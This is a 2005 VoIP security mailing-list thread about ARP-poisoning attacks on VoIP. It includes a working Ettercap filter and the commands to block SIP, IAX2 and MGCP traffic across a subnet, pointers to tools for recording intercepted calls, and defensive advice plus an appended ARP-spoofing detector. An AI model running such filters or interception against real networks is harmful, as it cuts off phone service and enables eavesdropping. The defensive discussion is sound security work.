[VOIPSEC] VoIP Blocking Filter w/Ettercap

Natas natas05 at gmail.com
Wed Jul 13 20:06:54 CDT 2005


With Cain & Abel you can do ARP poisoning and record/reconstruct SIP
or H.323 conversations that use the G711 uLaw, G771 aLaw, ADPCM, DVI4,
LPC, GSM610, Microsoft GSM, L16, G729, Speex or iLBC codecs.


On 7/13/05, Christopher A. Martin <chris at infravast.com> wrote:
> You can listen to g711 with ethereal.
> 
> -----Original Message-----
> From: Voipsec-bounces at voipsa.org [mailto:Voipsec-bounces at voipsa.org] On
> Behalf Of Nispel, Markus
> Sent: 07/13/2005 10:29 AM
> To: Credland, Jim; Natas; Voipsec at voipsa.org
> Subject: RE: [VOIPSEC] VoIP Blocking Filter w/Ettercap
> 
> The tool you are looking for is probably VOMIT http://vomit.xtdnet.nl/
> 
> In general you should look at preventing these MiTM attacks by using
> Arpwatch-like tools and/or implementing authentication so you really only
> have trusted users on your network. It's really a layered approach to
> this; there are multiple steps you can/should do.
> 
> Regards
> 
> Markus
> 
> 
> Markus Nispel
> Office of the CTO
> Enterasys Networks
> markus.nispel at enterasys.com
> 
> 
> 
> -----Original Message-----
> From: Voipsec-bounces at voipsa.org [mailto:Voipsec-bounces at voipsa.org] On
> Behalf Of Credland, Jim
> Sent: Wednesday, 13 July 2005 16:32
> To: Natas; Voipsec at voipsa.org
> Subject: RE: [VOIPSEC] VoIP Blocking Filter w/Ettercap
> 
> Protecting a network to which people have physical access is tricky.
> Ettercap is a scary reminder of how easy it is to intercept/reroute and
> generally ethernet segments.  If you've got a test network to try a man
> in the middle attack on using ettercap it's well worth it for the
> amusement value alone.
> 
> In an enterprise environment requiring a high standard of VoIP security
> I'd definitely be considering something like 802.1x port authentication
> to reduce the risk from someone connecting a PC to the VoIP vLAN, and if
> it was readily available encryption of the voice and switching traffic.
> 
> Much of the documentation on VoIP Security seems to skip over these
> kinds of problems, the NIST document's solution is to use encryption,
> authentication and public keys.  This does little about
> denial-of-service and has the lack of support for these kinds of
> features in many implementations.  The Cisco VoIP security document
> used to suggest you don't let anyone bad near your switch - but I've
> noticed a new document on their site listing a whole load of layer 2
> security features - see
> http://www.cisco.com/en/US/netsol/ns340/ns394/ns165/networking_solutions_white_paper0900aecd80240249.shtml
> - in the layer 2 defenses section.  I'd be interested - if your test
> switch has these features - in whether or not you can cause much
> disruption with these features enabled.
> 
> I think I saw a tool for listening to intercepted RTP streams but I
> forget what it's called?
> 
> Luckily once you get out of your LAN environment to a central server or
> carrier environment where there are strong physical access controls then
> this kind of security becomes less critical and other problems raise
> their heads instead.
> 
> jim.credland at thus.net
> Security Consultant
> 
> 
> > -----Original Message-----
> > From: Natas [mailto:natas05 at gmail.com]
> > Sent: 13 July 2005 02:09
> > To: Voipsec at voipsa.org
> > Subject: [VOIPSEC] VoIP Blocking Filter w/Ettercap
> >
> > After playing around with ettercap and its filter program,
> > etterfilter, I realized how easy it would be to ARP poison a network
> > and block all VoIP packets from passing through.
> > While packet manipulation obviously isn't new, and the root of the
> > problem comes from the ease of ARP poisoning, I was still kind of
> > shocked at how easy an attack like this could be pulled off in a real
> > world scenario.
> > A simple ettercap filter can be used to block all SIP, IAX2 and MGCP
> > traffic, stopping any possible communication across a network segment,
> > but letting other traffic properly pass through. Below is a basic
> > filter I wrote up for this list.
> >
> >
> > # blockvoip.filter
> > # Proof of concept VoIP blocking filter
> > # By Natas
> > # Instructions:
> > # Run "etterfilter blockvoip.filter -o blockvoip.ef"
> > # Then "ettercap -T -q -F blockvoip.ef -M ARP /10.1.1.1-254/ //"
> >
> > if (ip.proto == UDP && udp.src == 4569) {
> >     msg("Killed Attempted IAX2 Connection.\n");
> >     drop();
> >     kill();
> > }
> >
> > if (ip.proto == UDP && udp.src == 5060) {
> >     msg("Killed Attempted SIP Connection.\n");
> >     drop();
> >     kill();
> > }
> >
> > if (ip.proto == UDP && udp.src == 2427) {
> >     msg("Killed Attempted MGCP Connection.\n");
> >     drop();
> >     kill();
> > }
> >
> > # Don't know too much about MGCP Call Agent traffic but
> > # I put it in here for the hell of it.
> > if (ip.proto == UDP && udp.src == 2727) {
> >     msg("Killed Attempted MGCP Call Agent Connection.\n");
> >     drop();
> >     kill();
> > }
> >
> > # End.
> >
> > Obviously this is just a simple example and could easily be expanded
> > to ensure that no VoIP traffic whatsoever passes through.
> >
> > I'm not sure how everyone here will feel about this little example but
> > I wanted to put it out there for everyone to see.
> > I have some other VoIP packet manipulation ideas that I am playing
> > around with.
> >
> > I enjoy the VoIPSA mailing list very much and like reading everyone's
> > posts and concerns. If you would like to talk off the list, feel free
> > to email me or contact me at 206-338-3337.
> >
> > Natas
> >
> > _______________________________________________
> > Voipsec mailing list
> > Voipsec at voipsa.org
> > http://voipsa.org/mailman/listinfo/voipsec_voipsa.org
> >
>
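
Added example, not part of the original thread: a sketch of the binding-change check that the Arpwatch-like tools recommended in Markus Nispel's reply perform to catch ARP poisoning. The frames, MAC addresses and the `max_ips_per_mac` threshold are constructed assumptions; only the 10.1.1.x range comes from the thread.

```python
import struct

ARP_ETHERTYPE = 0x0806

def parse_arp(frame: bytes):
    """Return (opcode, sender_mac, sender_ip) for an Ethernet/IPv4 ARP frame, else None."""
    if len(frame) < 42 or struct.unpack("!H", frame[12:14])[0] != ARP_ETHERTYPE:
        return None
    htype, ptype, hlen, plen, oper = struct.unpack("!HHBBH", frame[14:22])
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        return None
    return oper, frame[22:28].hex(":"), ".".join(map(str, frame[28:32]))

class ArpMonitor:
    """Tracks sender IP -> MAC bindings and reports the changes poisoning causes."""
    def __init__(self, max_ips_per_mac=1):  # threshold is an assumption; tune per network
        self.ip_to_mac, self.mac_to_ips = {}, {}
        self.max_ips_per_mac = max_ips_per_mac

    def observe(self, frame: bytes):
        parsed = parse_arp(frame)
        if parsed is None:
            return []
        _, mac, ip = parsed
        alerts = []
        known = self.ip_to_mac.get(ip)
        if known is not None and known != mac:
            alerts.append(f"changed binding: {ip} was {known}, now {mac}")
        self.ip_to_mac[ip] = mac
        ips = self.mac_to_ips.setdefault(mac, set())
        ips.add(ip)
        if len(ips) > self.max_ips_per_mac:
            alerts.append(f"one MAC, many IPs: {mac} claims {sorted(ips)}")
        return alerts

def make_arp_reply(src_mac, src_ip, dst_mac, dst_ip):
    """Build a constructed ARP reply frame (sample input only)."""
    mac = lambda s: bytes.fromhex(s.replace(":", ""))
    ip = lambda s: bytes(map(int, s.split(".")))
    eth = mac(dst_mac) + mac(src_mac) + struct.pack("!H", ARP_ETHERTYPE)
    return eth + struct.pack("!HHBBH", 1, 0x0800, 6, 4, 2) + mac(src_mac) + ip(src_ip) + mac(dst_mac) + ip(dst_ip)

def run_demo():
    GW, PHONE, ROGUE = "00:11:22:33:44:55", "00:aa:bb:cc:dd:01", "02:00:00:00:00:99"
    frames = [  # constructed traffic: two honest replies, then two forged ones
        make_arp_reply(GW, "10.1.1.1", PHONE, "10.1.1.20"),
        make_arp_reply(PHONE, "10.1.1.20", GW, "10.1.1.1"),
        make_arp_reply(ROGUE, "10.1.1.1", PHONE, "10.1.1.20"),
        make_arp_reply(ROGUE, "10.1.1.20", GW, "10.1.1.1"),
    ]
    monitor = ArpMonitor()
    return [a for f in frames for a in monitor.observe(f)]

if __name__ == "__main__":
    print("\n".join(run_demo()))
```

A multi-homed host or a proxy-ARP router legitimately answers for several addresses, so the per-MAC threshold needs an allowlist in practice.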



